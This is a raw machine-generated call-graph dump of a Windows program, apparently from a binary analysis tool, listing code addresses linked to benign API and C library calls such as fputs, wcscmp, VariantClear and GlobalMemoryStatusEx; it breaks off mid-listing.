6b7a44 DeviceIoControl 76078->76079 76078->76080 76079->76080 76080->76072 76089 6b780d 8 API calls ctype 76080->76089 76082 6b7aa5 76084 6b77de 5 API calls 76082->76084 76088 6b9252 GetModuleHandleW GetProcAddress GetDiskFreeSpaceW 76083->76088 76084->76072 76086 6b79d0 76086->76076 76087->76063 76088->76086 76089->76082 76090 736ba3 VirtualFree 76091 6e993d 76175 6eb5b1 76091->76175 76094 6e9963 76181 6c1f33 76094->76181 76095 6b1fb3 11 API calls 76095->76094 76097 6e9975 76098 6e99b7 GetStdHandle GetConsoleScreenBufferInfo 76097->76098 76099 6e99ce 76097->76099 76098->76099 76100 6b1e0c ctype 2 API calls 76099->76100 76101 6e99dc 76100->76101 76302 6d7b48 76101->76302 76103 6e9a29 76319 6eb96d _CxxThrowException 76103->76319 76105 6e9a30 76320 6d7018 8 API calls 2 library calls 76105->76320 76107 6e9a7c 76321 6dddb5 6 API calls 2 library calls 76107->76321 76108 6e9a66 _CxxThrowException 76108->76107 76110 6e9aa6 76112 6e9aaa _CxxThrowException 76110->76112 76120 6e9ac0 76110->76120 76111 6e9a37 76111->76107 76111->76108 76112->76120 76113 6e9b3a 76325 6b1fa0 fputc 76113->76325 76115 6e9bfa _CxxThrowException 76170 6e9be6 76115->76170 76117 6e9b63 fputs 76326 6b1fa0 fputc 76117->76326 76120->76113 76120->76115 76322 6d7dd7 7 API calls 2 library calls 76120->76322 76323 6ec077 6 API calls 76120->76323 76324 6b1e40 free 76120->76324 76121 6e9b79 strlen strlen 76122 6e9baa fputs fputc 76121->76122 76123 6e9e25 76121->76123 76122->76170 76334 6b1fa0 fputc 76123->76334 76126 6e9e2c fputs 76335 6b1fa0 fputc 76126->76335 76128 6e9f0c 76340 6b1fa0 fputc 76128->76340 76131 6e9f13 fputs 76341 6b1fa0 fputc 76131->76341 76133 6eb67d 12 API calls 76133->76170 76135 6e9f9f 76137 6eac3a 76135->76137 76140 6eac35 76135->76140 76347 6eb96d _CxxThrowException 76137->76347 76138 6b2e04 2 API calls 76138->76170 76346 6eb988 33 API calls __aulldiv 76140->76346 76143 6eac42 76348 6b1e40 free 76143->76348 76147 6eac4d 76148 6d3247 free 76147->76148 76150 6eac5d 76148->76150 76149 6e9f29 76149->76135 76163 6e9f77 fputs 76149->76163 76342 6eb650 fputc fputs fputs fputc 76149->76342 76343 6eb5e9 fputc fputs 76149->76343 76344 6ebde4 fputc fputs 76149->76344 76349 6b1e40 free 76150->76349 76151 6e9d2a fputs 76331 6b21d8 fputs 76151->76331 76156 6eac7d 76350 6b11c2 free __EH_prolog ctype 76156->76350 76157 6e9d5f fputs 76157->76170 76158 6b31e5 malloc _CxxThrowException free _CxxThrowException 76158->76170 76162 6e9e42 76162->76128 76169 6e9ee0 fputs 76162->76169 76336 6eb650 fputc fputs fputs fputc 76162->76336 76337 6b21d8 fputs 76162->76337 76338 6ebde4 fputc fputs 76162->76338 76345 6b1fa0 fputc 76163->76345 76166 6eac89 76351 6ebe0c free __EH_prolog ctype 76166->76351 76339 6b1fa0 fputc 76169->76339 76170->76122 76170->76123 76170->76133 76170->76138 76170->76151 76170->76157 76170->76158 76327 6b21d8 fputs 76170->76327 76328 6b315e malloc _CxxThrowException free _CxxThrowException 76170->76328 76329 6b3221 malloc _CxxThrowException free _CxxThrowException 76170->76329 76330 6b1089 malloc _CxxThrowException free _CxxThrowException 76170->76330 76332 6b1fa0 fputc 76170->76332 76333 6b1e40 free 76170->76333 76171 6eac98 76352 6e2db9 free ctype 76171->76352 76174 6eaca4 76176 6eb5bc fputs 76175->76176 76177 6e994a 76175->76177 76353 6b1fa0 fputc 76176->76353 76177->76094 76177->76095 76179 6eb5d5 76179->76177 76180 6eb5d9 fputs 76179->76180 76180->76177 76182 6c1f6c 76181->76182 76183 6c1f4f 76181->76183 76354 6c29eb 76182->76354 76386 6d1d73 5 API calls __EH_prolog 76183->76386 76186 6c1f5e _CxxThrowException 76186->76182 76188 6c1fa3 76190 6c1fbc 76188->76190 76193 6b4fc0 5 API calls 76188->76193 76191 6c1fda 76190->76191 76194 6b2fec 3 API calls 76190->76194 76195 6c2022 wcscmp 76191->76195 76203 6c2036 76191->76203 76192 6c1f95 _CxxThrowException 76192->76188 76193->76190 76194->76191 76196 6c20af 76195->76196 76195->76203 76388 6d1d73 5 API calls __EH_prolog 76196->76388 76198 6c20a9 76389 6c393c 6 API calls 2 library calls 76198->76389 76199 6c20be _CxxThrowException 76199->76203 76201 6c20f4 76390 6c393c 6 API calls 2 library calls 76201->76390 76203->76198 76208 6c219a 76203->76208 76204 6c2108 76205 6c2135 76204->76205 76391 6c2e04 62 API calls 2 library calls 76204->76391 76213 6c2159 76205->76213 76392 6c2e04 62 API calls 2 library calls 76205->76392 76393 6d1d73 5 API calls __EH_prolog 76208->76393 76210 6c21a9 _CxxThrowException 76210->76213 76211 6c227f 76359 6c2aa9 76211->76359 76213->76211 76214 6c2245 76213->76214 76394 6d1d73 5 API calls __EH_prolog 76213->76394 76217 6b2fec 3 API calls 76214->76217 76220 6c225c 76217->76220 76218 6c22d9 76222 6c2302 76218->76222 76223 6b2fec 3 API calls 76218->76223 76219 6c2237 _CxxThrowException 76219->76214 76220->76211 76395 6d1d73 5 API calls __EH_prolog 76220->76395 76221 6b2fec 3 API calls 76221->76218 76224 6b4fc0 5 API calls 76222->76224 76223->76222 76226 6c2315 76224->76226 76377 6c384c 76226->76377 76227 6c2271 _CxxThrowException 76227->76211 76229 6c2322 76231 6c26c6 76229->76231 76240 6c23a1 76229->76240 76230 6c28ce 76232 6c293a 76230->76232 76249 6c28d5 76230->76249 76231->76230 76233 6c2700 76231->76233 76408 6d1d73 5 API calls __EH_prolog 76231->76408 76235 6c293f 76232->76235 76236 6c29a5 76232->76236 76409 6c32ec 14 API calls 2 library calls 76233->76409 76416 6b4eec 16 API calls 76235->76416 76241 6c29ae _CxxThrowException 76236->76241 76258 6c264d 76236->76258 76238 6c2713 76243 6c3a29 5 API calls 76238->76243 76245 6c247a wcscmp 76240->76245 76265 6c248e 76240->76265 76242 6c26f2 _CxxThrowException 76242->76233 76259 6c2722 76243->76259 76244 6c294c 76417 6b4ea1 8 API calls 76244->76417 76248 6c24cf wcscmp 76245->76248 76245->76265 76250 6c24ef wcscmp 76248->76250 76248->76265 76249->76258 76415 6d1d73 5 API calls __EH_prolog 76249->76415 76254 6c250f 76250->76254 76250->76265 76251 6c2953 76255 6b4fc0 5 API calls 76251->76255 76399 6d1d73 5 API calls __EH_prolog 76254->76399 76255->76258 76256 6c2920 _CxxThrowException 76256->76258 76258->76097 76261 6c27cf 76259->76261 76264 6b2fec 3 API calls 76259->76264 76260 6c251e _CxxThrowException 76263 6c252c 76260->76263 76262 6c2880 76261->76262 76277 6c281f 76261->76277 76411 6d1d73 5 API calls __EH_prolog 76261->76411 76269 6b2fec 3 API calls 76262->76269 76275 6c289b 76262->76275 76272 6c2569 76263->76272 76400 6c2e04 62 API calls 2 library calls 76263->76400 76273 6c27a9 76264->76273 76265->76263 76396 6b4eec 16 API calls 76265->76396 76397 6b4ea1 8 API calls 76265->76397 76398 6d1d73 5 API calls __EH_prolog 76265->76398 76267 6c24c1 _CxxThrowException 76267->76248 76269->76275 76271 6c258c 76274 6c25a4 76271->76274 76402 6c2a61 malloc _CxxThrowException free _CxxThrowException memcpy 76271->76402 76272->76271 76401 6c2e04 62 API calls 2 library calls 76272->76401 76273->76261 76410 6b3563 memmove 76273->76410 76403 6b4eec 16 API calls 76274->76403 76275->76258 76414 6d1d73 5 API calls __EH_prolog 76275->76414 76276 6c2811 _CxxThrowException 76276->76277 76277->76262 76278 6c2847 76277->76278 76412 6d1d73 5 API calls __EH_prolog 76277->76412 76278->76262 76413 6d1d73 5 API calls __EH_prolog 76278->76413 76285 6c25ad 76404 6d1b07 49 API calls 76285->76404 76286 6c28c0 _CxxThrowException 76286->76230 76287 6c2839 _CxxThrowException 76287->76278 76290 6c2872 _CxxThrowException 76290->76262 76291 6c25b4 76405 6b4ea1 8 API calls 76291->76405 76293 6c25bb 76294 6b2fec 3 API calls 76293->76294 76296 6c25d6 76293->76296 76294->76296 76295 6c261f 76295->76258 76298 6b2fec 3 API calls 76295->76298 76296->76258 76296->76295 76406 6d1d73 5 API calls __EH_prolog 76296->76406 76300 6c263f 76298->76300 76299 6c2611 _CxxThrowException 76299->76295 76407 6b859e malloc _CxxThrowException free _CxxThrowException 76300->76407 76303 6d7b52 __EH_prolog 76302->76303 76427 6d7eec 76303->76427 76305 6d7b63 76307 6d7ca4 76305->76307 76308 6b2e04 malloc _CxxThrowException 76305->76308 76309 6b30ea malloc _CxxThrowException free 76305->76309 76311 6b1e40 free ctype 76305->76311 76313 6f04d2 5 API calls 76305->76313 76316 6b429a 3 API calls 76305->76316 76317 6d7c61 memcpy 76305->76317 76432 6d70ea 76305->76432 76435 6d7a40 76305->76435 76453 6d7cc3 6 API calls 76305->76453 76454 6c12a5 76305->76454 76459 6d74eb malloc _CxxThrowException memcpy __EH_prolog ctype 76305->76459 76460 6d7193 76305->76460 76307->76103 76308->76305 76309->76305 76311->76305 76313->76305 76316->76305 76317->76305 76319->76105 76320->76111 76321->76110 76322->76120 76323->76120 76324->76120 76325->76117 76326->76121 76327->76170 76328->76170 76329->76170 76330->76170 76331->76170 76332->76170 76333->76170 76334->76126 76335->76162 76336->76162 76337->76162 76338->76162 76339->76162 76340->76131 76341->76149 76342->76149 76343->76149 76344->76149 76345->76149 76346->76137 76347->76143 76348->76147 76349->76156 76350->76166 76351->76171 76352->76174 76353->76179 76355 6b2f1c 2 API calls 76354->76355 76358 6c29fe 76355->76358 76357 6c1f7e 76357->76188 76387 6d1d73 5 API calls __EH_prolog 76357->76387 76418 6b1e40 free 76358->76418 76360 6c2ab3 __EH_prolog 76359->76360 76361 6b2e8a 2 API calls 76360->76361 76371 6c2b0f 76360->76371 76362 6c2af4 76361->76362 76419 6c2a61 malloc _CxxThrowException free _CxxThrowException memcpy 76362->76419 76363 6c22ad 76363->76218 76363->76221 76365 6c2bc6 76425 6d1d73 5 API calls __EH_prolog 76365->76425 76366 6c2b04 76420 6b1e40 free 76366->76420 76369 6c2bd6 _CxxThrowException 76369->76363 76371->76363 76371->76365 76374 6c2b9f 76371->76374 76421 6c2cb4 48 API calls 2 library calls 76371->76421 76422 6c2bf5 8 API calls __EH_prolog 76371->76422 76423 6c2a61 malloc _CxxThrowException free _CxxThrowException memcpy 76371->76423 76374->76363 76424 6d1d73 5 API calls __EH_prolog 76374->76424 76376 6c2bb8 _CxxThrowException 76376->76365 76378 6c3856 __EH_prolog 76377->76378 76379 6b2e04 malloc _CxxThrowException 76378->76379 76380 6b2fec 3 API calls 76378->76380 76381 6b2f88 3 API calls 76378->76381 76382 6f04d2 5 API calls 76378->76382 76384 6b1e40 free ctype 76378->76384 76385 6c3917 76378->76385 76426 6c3b76 malloc _CxxThrowException __EH_prolog ctype 76378->76426 76379->76378 76380->76378 76381->76378 76382->76378 76384->76378 76385->76229 76386->76186 76387->76192 76388->76199 76389->76201 76390->76204 76391->76205 76392->76213 76393->76210 76394->76219 76395->76227 76396->76265 76397->76265 76398->76267 76399->76260 76400->76272 76401->76271 76402->76274 76403->76285 76404->76291 76405->76293 76406->76299 76407->76258 76408->76242 76409->76238 76410->76261 76411->76276 76412->76287 76413->76290 76414->76286 76415->76256 76416->76244 76417->76251 76418->76357 76419->76366 76420->76371 76421->76371 76422->76371 76423->76371 76424->76376 76425->76369 76426->76378 76428 6d7f14 76427->76428 76431 6d7ef7 76427->76431 76428->76305 76429 6d7193 free 76429->76431 76431->76428 76431->76429 76468 6b1e40 free 76431->76468 76433 6b2e04 2 API calls 76432->76433 76434 6d7103 76433->76434 76434->76305 76436 6d7a4a __EH_prolog 76435->76436 76469 6b361b 6 API calls 2 library calls 76436->76469 76438 6d7a78 76470 6b361b 6 API calls 2 library calls 76438->76470 76440 6d7b20 76472 6e2db9 free ctype 76440->76472 76442 6b2e04 malloc _CxxThrowException 76452 6d7a83 76442->76452 76443 6d7b2b 76473 6e2db9 free ctype 76443->76473 76445 6d7b37 76445->76305 76446 6b2fec 3 API calls 76446->76452 76447 6f04d2 5 API calls 76447->76452 76448 6b2fec 3 API calls 76449 6d7aca wcscmp 76448->76449 76449->76452 76451 6b1e40 free ctype 76451->76452 76452->76440 76452->76442 76452->76446 76452->76447 76452->76448 76452->76451 76471 6d7955 malloc _CxxThrowException __EH_prolog ctype 76452->76471 76453->76305 76455 6f04d2 5 API calls 76454->76455 76456 6c12ad 76455->76456 76457 6b1e0c ctype 2 API calls 76456->76457 76458 6c12b4 76457->76458 76458->76305 76459->76305 76461 6d719d __EH_prolog 76460->76461 76474 6e2db9 free ctype 76461->76474 76463 6d71b3 76475 6d71d5 free __EH_prolog ctype 76463->76475 76465 6d71bf 76476 6b1e40 free 76465->76476 76467 6d71c7 76467->76305 76468->76431 76469->76438 76470->76452 76471->76452 76472->76443 76473->76445 76474->76463 76475->76465 76476->76467 76477 747da0 WaitForSingleObject 76478 747dc1 76477->76478 76479 747dbb GetLastError 76477->76479 76480 747dce CloseHandle 76478->76480 76481 747ddf 76478->76481 76479->76478 76480->76481 76482 747dd9 GetLastError 76480->76482 76482->76481 76483 6dcefb 76484 6dd0cc 76483->76484 76485 6dcf03 76483->76485 76485->76484 76530 6dcae9 VariantClear 76485->76530 76487 6dcf59 76487->76484 76531 6dcae9 VariantClear 76487->76531 76489 6dcf71 76489->76484 76532 6dcae9 VariantClear 76489->76532 76491 6dcf87 76491->76484 76533 6dcae9 VariantClear 76491->76533 76493 6dcf9d 76493->76484 76534 6dcae9 VariantClear 76493->76534 76495 6dcfb3 76495->76484 76535 6dcae9 VariantClear 76495->76535 76497 6dcfc9 76497->76484 76536 6b4504 malloc _CxxThrowException 76497->76536 76499 6dcfdc 76500 6b2e04 2 API calls 76499->76500 76502 6dcfe7 76500->76502 76501 6dd009 76504 6dd080 76501->76504 76505 6dd030 76501->76505 76529 6dd07b 76501->76529 76502->76501 76503 6b2f88 3 API calls 76502->76503 76503->76501 76541 6d7a0c CharUpperW 76504->76541 76508 6b2e04 2 API calls 76505->76508 76511 6dd038 76508->76511 76509 6dd0c4 76545 6b1e40 free 76509->76545 76510 6dd08b 76542 6cfdbc 4 API calls 2 library calls 76510->76542 76513 6b2e04 2 API calls 76511->76513 76515 6dd046 76513->76515 76537 6cfdbc 4 API calls 2 library calls 76515->76537 76516 6dd0a7 76518 6b2fec 3 API calls 76516->76518 76520 6dd0b3 76518->76520 76519 6dd057 76521 6b2fec 3 API calls 76519->76521 76543 6b1e40 free 76520->76543 76523 6dd063 76521->76523 76538 6b1e40 free 76523->76538 76525 6dd06b 76539 6b1e40 free 76525->76539 76527 6dd073 76540 6b1e40 free 76527->76540 76544 6b1e40 free 76529->76544 76530->76487 76531->76489 76532->76491 76533->76493 76534->76495 76535->76497 76536->76499 76537->76519 76538->76525 76539->76527 76540->76529 76541->76510 76542->76516 76543->76529 76544->76509 76545->76484 76546 6bc3bd 76547 6bc3db 76546->76547 76548 6bc3ca 76546->76548 76548->76547 76550 6b1e40 free 76548->76550 76550->76547 76551 6eadb7 76552 6eadc1 __EH_prolog 76551->76552 76553 6b26dd 2 API calls 76552->76553 76554 6eae1d 76553->76554 76555 6b2e04 2 API calls 76554->76555 76556 6eae38 76555->76556 76557 6b2e04 2 API calls 76556->76557 76558 6eae44 76557->76558 76559 6b2e04 2 API calls 76558->76559 76560 6eae68 76559->76560 76561 6ead29 2 API calls 76560->76561 76562 6eae85 76561->76562 76567 6eaf2d 76562->76567 76564 6eae94 76565 6b2e04 2 API calls 76564->76565 76566 6eaeb2 76565->76566 76568 6eaf37 __EH_prolog 76567->76568 76579 6c34f4 malloc _CxxThrowException __EH_prolog 76568->76579 76570 6eafac 76571 6b2e04 2 API calls 76570->76571 76572 6eafbb 76571->76572 76573 6b2e04 2 API calls 76572->76573 76574 6eafca 76573->76574 76575 6b2e04 2 API calls 76574->76575 76576 6eafd9 76575->76576 76577 6b2e04 2 API calls 76576->76577 76578 6eafe8 76577->76578 76578->76564 76579->76570 76580 6e5475 76581 6b2fec 3 API calls 76580->76581 76582 6e54b4 76581->76582 76583 6ec911 24 API calls 76582->76583 76584 6e54bb 76583->76584 76585 6f8eb1 76590 6f8ed1 76585->76590 76587 6f8ec9 76591 6f8edb __EH_prolog 76590->76591 76599 6f9267 76591->76599 76595 6f8efd 76604 6ee5f1 free ctype 76595->76604 76597 6f8eb9 76597->76587 76598 6b1e40 free 76597->76598 76598->76587 76600 6f9271 __EH_prolog 76599->76600 76605 6b1e40 free 76600->76605 76602 6f8ef1 76603 6f922b free CloseHandle GetLastError ctype 76602->76603 76603->76595 76604->76597 76605->76602 76606 72f190 76607 6b1e0c ctype 2 API calls 76606->76607 76608 72f1b0 76607->76608 76610 7369d0 76611 7369d7 malloc 76610->76611 76612 7369d4 76610->76612 76613 6dd948 76643 6ddac7 76613->76643 76615 6dd94f 76616 6b2e04 2 API calls 76615->76616 76617 6dd97b 76616->76617 76618 6b2e04 2 API calls 76617->76618 76619 6dd987 76618->76619 76622 6dd9e7 76619->76622 76651 6b6404 76619->76651 76624 6dda0f 76622->76624 76625 6dda36 76622->76625 76676 6b1e40 free 76624->76676 76627 6dda94 76625->76627 76635 6b2da9 2 API calls 76625->76635 76640 6f04d2 5 API calls 76625->76640 76678 6b1524 malloc _CxxThrowException __EH_prolog ctype 76625->76678 76679 6b1e40 free 76625->76679 76680 6b1e40 free 76627->76680 76629 6dd9bf 76674 6b1e40 free 76629->76674 76631 6dda17 76677 6b1e40 free 76631->76677 76633 6dd9c7 76675 6b1e40 free 76633->76675 76634 6dda9c 76681 6b1e40 free 76634->76681 76635->76625 76639 6dd9cf 76640->76625 76644 6ddad1 __EH_prolog 76643->76644 76645 6b2e04 2 API calls 76644->76645 76646 6ddb33 76645->76646 76647 6b2e04 2 API calls 76646->76647 76648 6ddb3f 76647->76648 76649 6b2e04 2 API calls 76648->76649 76650 6ddb55 76649->76650 76650->76615 76652 6b631f 9 API calls 76651->76652 76653 6b6414 76652->76653 76654 6b6423 76653->76654 76655 6b2f88 3 API calls 76653->76655 76656 6b2f88 3 API calls 76654->76656 76655->76654 76657 6b643d 76656->76657 76658 6c7e5a 76657->76658 76659 6c7e64 __EH_prolog 76658->76659 76682 6c8179 76659->76682 76662 6d7ebb free 76663 6c7e7f 76662->76663 76664 6b2fec 3 API calls 76663->76664 76665 6c7e9a 76664->76665 76666 6b2da9 2 API calls 76665->76666 76667 6c7ea7 76666->76667 76668 6b6c72 44 API calls 76667->76668 76669 6c7eb7 76668->76669 76687 6b1e40 free 76669->76687 76671 6c7ecb 76672 6c7ed8 76671->76672 76688 6b757d GetLastError 76671->76688 76672->76622 76672->76629 76674->76633 76675->76639 76676->76631 76677->76639 76678->76625 76679->76625 76680->76634 76681->76639 76686 6c8906 76682->76686 76683 6c7e77 76683->76662 76686->76683 76689 6c8804 free ctype 76686->76689 76690 6b1e40 free 76686->76690 76687->76671 76688->76672 76689->76686 76690->76686 76691 6da7c5 76699 6da96b 76691->76699 76709 6da7e9 76691->76709 76692 6dade3 76796 6b1e40 free 76692->76796 76694 6da952 76694->76699 76777 6de0b0 6 API calls 76694->76777 76695 6dadeb 76797 6b1e40 free 76695->76797 76699->76692 76700 6dac1e 76699->76700 76726 6dac6c 76699->76726 76738 6dad88 76699->76738 76743 6dad17 76699->76743 76744 6dacbc 76699->76744 76758 6c101c 76699->76758 76761 6d98f2 76699->76761 76767 6dcc6f 76699->76767 76778 6d9531 5 API calls __EH_prolog 76699->76778 76779 6d80c1 malloc _CxxThrowException __EH_prolog 76699->76779 76780 6dc820 5 API calls 2 library calls 76699->76780 76781 6d814d 6 API calls 76699->76781 76782 6d8125 free ctype 76699->76782 76783 6b1e40 free 76700->76783 76701 6dae99 76704 6b1e0c ctype 2 API calls 76701->76704 76707 6daea9 memset memset 76704->76707 76705 6dac26 76784 6b1e40 free 76705->76784 76706 6dadf3 76706->76701 76712 6f04d2 malloc _CxxThrowException free _CxxThrowException memcpy 76706->76712 76710 6daedd 76707->76710 76709->76694 76717 6f04d2 5 API calls 76709->76717 76776 6de0b0 6 API calls 76709->76776 76798 6b1e40 free 76710->76798 76712->76706 76713 6daee5 76799 6b1e40 free 76713->76799 76717->76709 76718 6daef0 76800 6b1e40 free 76718->76800 76719 6dac2e 76801 6b1e40 free 76719->76801 76723 6dc430 76802 6b1e40 free 76723->76802 76725 6dc438 76803 6b1e40 free 76725->76803 76785 6b1e40 free 76726->76785 76730 6dc443 76804 6b1e40 free 76730->76804 76731 6dac85 76786 6b1e40 free 76731->76786 76734 6dc44e 76805 6b1e40 free 76734->76805 76736 6dc459 76793 6d8125 free ctype 76738->76793 76742 6dad93 76794 6b1e40 free 76742->76794 76790 6d8125 free ctype 76743->76790 76787 6d8125 free ctype 76744->76787 76748 6dad3c 76791 6b1e40 free 76748->76791 76749 6dadac 76795 6b1e40 free 76749->76795 76750 6dacc7 76788 6b1e40 free 76750->76788 76754 6dace0 76789 6b1e40 free 76754->76789 76755 6dad55 76792 6b1e40 free 76755->76792 76760 6bb95a 6 API calls 76758->76760 76759 6c1028 76759->76699 76760->76759 76762 6d98fc __EH_prolog 76761->76762 76806 6d9987 76762->76806 76764 6d9970 76764->76699 76766 6d9911 76766->76764 76810 6def8d 12 API calls 2 library calls 76766->76810 76850 6f5505 76767->76850 76854 6ff445 76767->76854 76860 6fcf91 76767->76860 76768 6dcc8b 76772 6dcccb 76768->76772 76868 6d979e VariantClear __EH_prolog 76768->76868 76770 6dccb1 76770->76772 76869 6dcae9 VariantClear 76770->76869 76772->76699 76776->76709 76777->76699 76778->76699 76779->76699 76780->76699 76781->76699 76782->76699 76783->76705 76784->76719 76785->76731 76786->76719 76787->76750 76788->76754 76789->76719 76790->76748 76791->76755 76792->76719 76793->76742 76794->76749 76795->76719 76796->76695 76797->76706 76798->76713 76799->76718 76800->76719 76801->76723 76802->76725 76803->76730 76804->76734 76805->76736 76807 6d9991 __EH_prolog 76806->76807 76811 7080aa 76807->76811 76808 6d99a8 76808->76766 76810->76764 76812 7080b4 __EH_prolog 76811->76812 76813 6b1e0c ctype 2 API calls 76812->76813 76814 7080bf 76813->76814 76815 7080d3 76814->76815 76817 6fbdb5 76814->76817 76815->76808 76818 6fbdbf __EH_prolog 76817->76818 76823 6fbe69 76818->76823 76820 6fbdef 76821 6b2e04 2 API calls 76820->76821 76822 6fbe16 76821->76822 76822->76815 76824 6fbe73 __EH_prolog 76823->76824 76827 6f5e2b 76824->76827 76826 6fbe7f 76826->76820 76828 6f5e35 __EH_prolog 76827->76828 76833 6f08b6 76828->76833 76830 6f5e41 76838 6cdfc9 malloc _CxxThrowException __EH_prolog 76830->76838 76832 6f5e57 76832->76826 76839 6b9c60 76833->76839 76835 6f08c4 76844 6b9c8f GetModuleHandleA GetProcAddress 76835->76844 76837 6f08f3 __aulldiv 76837->76830 76838->76832 76849 6b9c4d GetCurrentProcess GetProcessAffinityMask 76839->76849 76841 6b9c6e 76842 6b9c80 GetSystemInfo 76841->76842 76843 6b9c79 76841->76843 76842->76835 76843->76835 76845 6b9cef GlobalMemoryStatus 76844->76845 76846 6b9cc4 GlobalMemoryStatusEx 76844->76846 76847 6b9d08 76845->76847 76846->76845 76848 6b9cce 76846->76848 76847->76848 76848->76837 76849->76841 76851 6f550f __EH_prolog 76850->76851 76870 6f4e8a 76851->76870 76855 6ff455 76854->76855 77086 6c1092 76855->77086 76859 6ff478 76859->76768 76861 6fcf9b __EH_prolog 76860->76861 76862 6ff445 14 API calls 76861->76862 76863 6fd018 76862->76863 76867 6fd01f 76863->76867 77102 701511 76863->77102 76865 6fd08b 76865->76867 77108 702c5d 11 API calls 2 library calls 76865->77108 76867->76768 76868->76770 76869->76772 76871 6f4e94 __EH_prolog 76870->76871 76872 6b2e04 2 API calls 76871->76872 76975 6f4f1d 76871->76975 76873 6f4ed7 76872->76873 77002 6c7fc5 76873->77002 76875 6f4f0a 76877 6b965d VariantClear 76875->76877 76876 6f4f37 76878 6f4f63 76876->76878 76879 6f4f41 76876->76879 76881 6f4f15 76877->76881 76880 6b2f88 3 API calls 76878->76880 76882 6b965d VariantClear 76879->76882 76883 6f4f71 76880->76883 77023 6b1e40 free 76881->77023 76885 6f4f4c 76882->76885 76886 6b965d VariantClear 76883->76886 77024 6b1e40 free 76885->77024 76888 6f4f80 76886->76888 77025 6c5bcf malloc _CxxThrowException 76888->77025 76890 6f4f9a 76891 6b2e47 2 API calls 76890->76891 76892 6f4fad 76891->76892 76893 6b2f1c 2 API calls 76892->76893 76894 6f4fbd 76893->76894 76895 6b2e04 2 API calls 76894->76895 76896 6f4fd1 76895->76896 76897 6b2e04 2 API calls 76896->76897 76904 6f4fdd 76897->76904 76898 6f5404 77064 6b1e40 free 76898->77064 76900 6f540c 77065 6b1e40 free 76900->77065 76902 6f5414 77066 6b1e40 free 76902->77066 76904->76898 77026 6c5bcf malloc _CxxThrowException 76904->77026 76906 6f5099 76908 6b2da9 2 API calls 76906->76908 76907 6f541c 77067 6b1e40 free 76907->77067 76910 6f50a9 76908->76910 76912 6b2fec 3 API calls 76910->76912 76911 6f5424 77068 6b1e40 free 76911->77068 76914 6f50b6 76912->76914 77027 6b1e40 free 76914->77027 76915 6f542c 77069 6b1e40 free 76915->77069 76918 6f50be 77028 6b1e40 free 76918->77028 76920 6f50cd 76921 6b2f88 3 API calls 76920->76921 76922 6f50e3 76921->76922 76923 6f50f1 76922->76923 76924 6f5100 76922->76924 76925 6b30ea 3 API calls 76923->76925 77029 6b3044 malloc _CxxThrowException free ctype 76924->77029 76927 6f50fe 76925->76927 77030 6c1029 6 API calls 76927->77030 76929 6f511a 76930 6f516b 76929->76930 76931 6f5120 76929->76931 77037 6c089e malloc _CxxThrowException free _CxxThrowException memcpy 76930->77037 77031 6b1e40 free 76931->77031 76934 6f5187 76938 6f04d2 5 API calls 76934->76938 76935 6f5128 77032 6b1e40 free 76935->77032 76937 6f5130 77033 6b1e40 free 76937->77033 76940 6f51ba 76938->76940 77038 6f0516 malloc _CxxThrowException ctype 76940->77038 76941 6f5138 77034 6b1e40 free 76941->77034 76944 6f51c5 76949 6f522d 76944->76949 76950 6f51f5 76944->76950 76945 6f5140 77035 6b1e40 free 76945->77035 76947 6f5148 77036 6b1e40 free 76947->77036 76951 6b2e04 2 API calls 76949->76951 77039 6b1e40 free 76950->77039 76999 6f5235 76951->76999 76953 6f51fd 77040 6b1e40 free 76953->77040 76956 6f5205 77041 6b1e40 free 76956->77041 76958 6f532e 77050 6b1e40 free 76958->77050 76959 6f520d 77042 6b1e40 free 76959->77042 76962 6f5347 76962->76898 76964 6f5358 76962->76964 76963 6f5215 77043 6b1e40 free 76963->77043 77051 6b1e40 free 76964->77051 76965 6f53a3 77057 6b1e40 free 76965->77057 76968 6f521d 77044 6b1e40 free 76968->77044 76969 6f5360 77052 6b1e40 free 76969->77052 76973 6f5368 77053 6b1e40 free 76973->77053 76975->76768 76977 6f53bc 77058 6b1e40 free 76977->77058 76978 6f5370 77054 6b1e40 free 76978->77054 76982 6f53c4 77059 6b1e40 free 76982->77059 76983 6f5378 77055 6b1e40 free 76983->77055 76985 6f04d2 5 API calls 76985->76999 76987 6f53cc 77060 6b1e40 free 76987->77060 76988 6f5380 77056 6b1e40 free 76988->77056 76992 6f53d4 77061 6b1e40 free 76992->77061 76994 6f53dc 77062 6b1e40 free 76994->77062 76996 6f53e4 77063 6b1e40 free 76996->77063 76999->76958 76999->76965 76999->76985 77000 6b2e04 2 API calls 76999->77000 77045 6f545c 5 API calls 2 library calls 76999->77045 77046 6c1029 6 API calls 76999->77046 77047 6c089e malloc _CxxThrowException free _CxxThrowException memcpy 76999->77047 77048 6f0516 malloc _CxxThrowException ctype 76999->77048 77049 6b1e40 free 76999->77049 77000->76999 77003 6c7fcf __EH_prolog 77002->77003 77004 6c8061 77003->77004 77006 6c805c 77003->77006 77007 6c8019 77003->77007 77011 6c7ff4 77003->77011 77004->77006 77018 6c8025 77004->77018 77078 6b9630 VariantClear 77006->77078 77010 6c801e 77007->77010 77007->77011 77009 6c80b8 77013 6b965d VariantClear 77009->77013 77014 6c8042 77010->77014 77015 6c8022 77010->77015 77020 6c800a 77011->77020 77070 6b950d 77011->77070 77017 6c80c0 77013->77017 77076 6b9597 VariantClear 77014->77076 77015->77018 77019 6c8032 77015->77019 77017->76875 77017->76876 77018->77020 77077 6b95df VariantClear 77018->77077 77075 6b9604 VariantClear 77019->77075 77079 6b9736 VariantClear 77020->77079 77023->76975 77024->76975 77025->76890 77026->76906 77027->76918 77028->76920 77029->76927 77030->76929 77031->76935 77032->76937 77033->76941 77034->76945 77035->76947 77036->76975 77037->76934 77038->76944 77039->76953 77040->76956 77041->76959 77042->76963 77043->76968 77044->76975 77045->76999 77046->76999 77047->76999 77048->76999 77049->76999 77050->76962 77051->76969 77052->76973 77053->76978 77054->76983 77055->76988 77056->76975 77057->76977 77058->76982 77059->76987 77060->76992 77061->76994 77062->76996 77063->76975 77064->76900 77065->76902 77066->76907 77067->76911 77068->76915 77069->76975 77080 6b9767 77070->77080 77072 6b9518 SysAllocStringLen 77073 6b9539 _CxxThrowException 77072->77073 77074 6b954f 77072->77074 77073->77074 77074->77020 77075->77020 77076->77020 77077->77020 77078->77020 77079->77009 77081 6b9779 77080->77081 77082 6b9770 77080->77082 77085 6b9686 VariantClear 77081->77085 77082->77072 77084 6b9780 77084->77072 77085->77084 77088 6bb95a 6 API calls 77086->77088 77087 6c10aa 77087->76859 77089 6ff1b2 77087->77089 77088->77087 77090 6ff1bc __EH_prolog 77089->77090 77099 6c1168 77090->77099 77092 